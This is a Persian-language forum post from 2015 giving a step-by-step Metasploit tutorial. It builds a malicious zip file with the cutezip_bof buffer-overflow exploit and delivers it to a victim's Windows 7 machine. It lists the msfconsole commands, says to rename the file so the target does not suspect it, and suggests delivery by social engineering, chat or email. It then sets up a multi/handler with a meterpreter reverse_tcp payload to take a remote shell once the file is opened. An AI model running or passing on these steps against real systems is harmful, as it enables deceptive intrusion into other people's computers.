Mahan.nofozi ارسال شده در ژوئن 6 2015 گزارش اشتراک گذاری ارسال شده در ژوئن 6 2015 در این نوع حمله ما با استفاده از متااسپلویت اقدام به ایجاد یک فایل ورد با پسوند zip میکنیم و سپس این فایل رو از طرق مختلف مثل ( مهندسی اجتماعی – چت – ایمیل و . . . ) به تارگت میدهیم . بعد از اجرا و باز کردن فایل توسط تاگت ما موتوانیم از سیستم قربانی دسترسی بگیریم . خوب بریم سراغ اموزش اصلی : تارکت :Wing FTP 4.3.8 سیستم عامل حمله : بک ترک 5 یا کالی سیستم عامل تارگت : ویندوز 7 گام اول :در ابتدا وارد بک ترک بشید و یه ترمینال جدید باز کنید و دستور Msfconsole رو بنویسید و اینتر کنید ( البته میتونید از Armitage هم استفاده کنید . تفاوتی نداره ) . گام دوم : حالا با استفاده از دستور use exploit/windows/fileformat/cutezip_bof وارد محیط اکسپلویت بشید . گام سوم : در اینجا کافیه یه show options بگیرید تا بهتون بگه چه مقادیری رو باید ست کنید گام چهارم : مقادیر زیر را عینا ست کنید در صورت اینکه مثلا مشکل پیش اومد خودتون بنویسید This is the hidden content, please ورود یا ثبت نام /emoticons/smile@2x.png 2x" width="20" height="20" /> This is the hidden content, please ورود یا ثبت نام در اینجا ایپی 192.168.1.2 همون ایپی هکر یا ایپی خودتون هست که باید جایگزین کنید . گام پنجم : بعد از اکسپلویت یک فایل با پسوند zip و نام msf در شاخه زیر ایجا میشود که باید این فایل رو تغییر نام بدید تا تارگت شک نکنه و متوجه حمله ما نشود . /root/.msf4/local/msf.zip و باعد با استفاده از دستورات زیر کامپیوتر خودمون رو اماده گرفتن اکسس از تارگت میکنیم . یه چیزی تو مایه های گوش ایستادن . use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.1.2 exploit در اخر هم فایل ایجاد شده در مرحله قبل را به هر طریقی که شده به تارگت میدیم تا اجرا کنه . ( چت – مهندسی اجتماعی – ایمیل و . . . ) . به محض باز کردن فایل توسط تارگت ما از سیستم تارگت شل میگیریم و میتونیم برای مرحله بعد حمله خودمون رو اماده کنیم . برای دسترسی به شل هم کافیه یک بار دستور Sessions -l رو وارد کنید . اگر شل گرفته باشید برای شما نشون میده . که یک ایدی هم داره سپس درستور Sessions -l رو به همراه ایدی وارد کنید تا به شل تارگت وصل بشید . به این ترتیب : با تشکر . شرکت امنیتی گاردایران ماهان (نفوذی) sessions -i ID واکنش ها : hesam_sabet، gfgfgfgfgf، alizombie و 8 نفر دیگر 11 لینک به دیدگاه به اشتراک گذاری در سایت های دیگر گزینه های به اشتراک گذاری بیشتر...
پست های پیشنهاد شده